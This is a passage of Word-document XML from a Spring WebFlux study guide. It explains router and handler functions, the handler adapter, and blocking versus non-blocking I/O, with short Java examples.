        <w:t xml:space="preserve"> defines the routes using RouterFunctions.route() for /hello and /goodbye.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365F69D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MyHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class defines the actual logic to respond to those routes (handleHello and handleGoodbye).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B17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hen a request is made to /hello, handleHello in MyHandler will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C63E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for /goodbye, handleGoodbye will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142D284"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outer Functions and Handler Functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92F43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eclarative Routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Router functions allow for a clear and concise way to define routes without relying on annotations, which can make the routing configuration easier to understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE8E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Style</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This approach promotes a functional style of programming in Spring WebFlux, which aligns well with the reactive nature of WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268AC1E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eparation of Concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The router handles routing and the handler handles the logic, providing a good separation of concerns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CEF2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outer functions can be easily composed using methods like .andRoute(), allowing you to build complex routing structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B005F6"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1BE170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define the routing logic, mapping requests to handler functions based on URL patterns and HTTP methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B2534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cess the requests and return the appropriate responses (Mono or Flux), which is the reactive way of handling data in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C8F81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85" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE234D7" w14:textId="5332E5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2" w:name="_Toc197867726"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the WebFluxHandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="512"/>
    </w:p>
    <w:p w14:paraId="3E62E2E0" w14:textId="2DF50EDA" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2"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n important component that acts as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dispatcher</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adapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for processing incoming HTTP requests. It is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux infrastructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is used to handle requests by invoking the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handler functions</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 methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A68523"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Points about WebFluxHandlerAdapter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E80C7"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quest Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AF563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responsible for adapting th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a handler that processes HTTP requests) to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which is the central dispatcher for routing and processing HTTP requests in WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088C5D6C"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is essentially a Spring WebFlux version of </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in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Instead of dealing with a traditional servlet-based model, it uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive model</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by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0BE8A3F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rpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8241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s main job is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dispatch requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to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such as the handler function or controller) and then </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>return a response</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the form of Mono&lt;ServerResponse&gt; or Flux&lt;ServerResponse&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE2209"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supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive request handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is designed to work with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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C816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unctionality</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6DD105"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receives an HTTP request and delegates the request to a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which is usually a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handler function</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w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F87CE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n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 xml:space="preserve"> (Mono or Flux), which will be sent back to the client after being processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDCFD8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le in WebFlux Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF688F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plays a crucial role in connecting the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux routing layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RouterFunctions and HandlerFunctions) to the reactive web processing flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF26286"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handler adapter is typically invoked by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xml:space="preserve"> during request processing in a WebFlux application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBA7808"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ample Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789BC470"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Client sends a request</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The HTTP request is processed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux DispatcherHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACBEE5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 adapter selects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based on the request, processes it, and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4C83E1A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sent</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The response is sent back to the client in a non-blocking, asynchronous manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7510F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re is WebFluxHandlerAdapter used?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818EE9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a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application,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lastRenderedPageBreak/>
        <w:t>Example in a WebFlux Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A09878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a typical WebFlux setup, the WebFluxHandlerAdapter is used implicitly as part of the Spring WebFlux infrastructure. Here’s how it fits in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1E94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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F9726"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nableWebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D64993"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class WebConfig implements WebFluxConfigurer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD14BCB" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245577D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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3962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void addCorsMappings(CorsRegistry registry) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F04133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gistry.addMapping("/**").allowedOrigins("*");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A62C02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3971C24D" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C37D7D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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655F509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RouterFunction&lt;ServerResponse&gt; route(MyHandler handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A32DF0"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outerFunctions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5326007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oute(RequestPredicates.GET("/hello"), handler::handleHello)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBC7F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andRoute(RequestPredicates.GET("/goodbye"), handler::handleGoodbye);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3764260E"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1814A55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6B18455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e above code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D29C83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er Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> routes the request to the handler functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F1DDA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nternally manages the dispatching of these requests by invoking the appropriate handler and returning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67D27344"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Using WebFluxHandlerAdapter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9CD8B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It is optimized for handling asynchronous and non-blocking operations, which is ideal for reactive programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3386C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eamless integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It integrates the reactive WebFlux programming model into the traditional request-response cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C5678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ing and handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Combines the routing logic (via RouterFunction) and the request handling (via handler functions), all done reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E20FEC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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DB119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 core component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responsible for adapting the incoming HTTP requests to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive web handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WebHandler) and returning reactive responses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593F1DB5" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00CE4B95" w:rsidRDefault="00AC4AF2"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It works in a non-blocking manner and is used as part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFlux dispatcher</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure smooth handling of asynchronous, reactive web requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA4885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86" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E426C" w14:textId="651C47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3" w:name="_Toc197867727"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between blocking and non-blocking in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="513"/>
    </w:p>
    <w:p w14:paraId="2C1B39CC" w14:textId="55470AE4" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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terms </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</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refer to how I/O operations are handled during request processing, and they have a significant impact on the application's performance, scalability, and responsiveness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8522F9"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Differences Between Blocking and Non-blocking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B787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Blocking I/O (Traditional Approach):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068FDB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ynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In a blocking I/O model, each thread waits (blocks) until an I/O operation is completed (such as reading data from a database or calling an external API) before moving on to the next operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DA2DD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Blocking I/O is commonly used in traditional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applications or when interacting with non-reactive libraries (which don't support non-blocking I/O).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407F4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502E1B4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13D8C1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sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F44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    // Simulating a blocking operation (e.g., database query, file read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C36DA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result = blockingService.getData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6FC3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sult;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9A264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DBB753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Non-blocking I/O (Reactive Programming):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8CAFC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Asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In a non-blocking I/O model, threads are not blocked while waiting for I/O operations. Instead, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming paradigm</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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is used, where I/O operations are asynchronous, and the result is delivered to the application when ready, without holding up the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F1A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A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>callback</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E7062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Non-blocking I/O is used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here the application responds to requests asynchronously, and is well-suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly concurrent, I/O-bound, and real-time applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52674F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6058782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3D0686E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sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E72F7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a non-blocking operation (e.g., asynchronous database query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B846B8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activeService.getData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021EF2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8497F52"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4296"/>
        <w:gridCol w:w="4519"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="3399C5C0" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblHeader/>
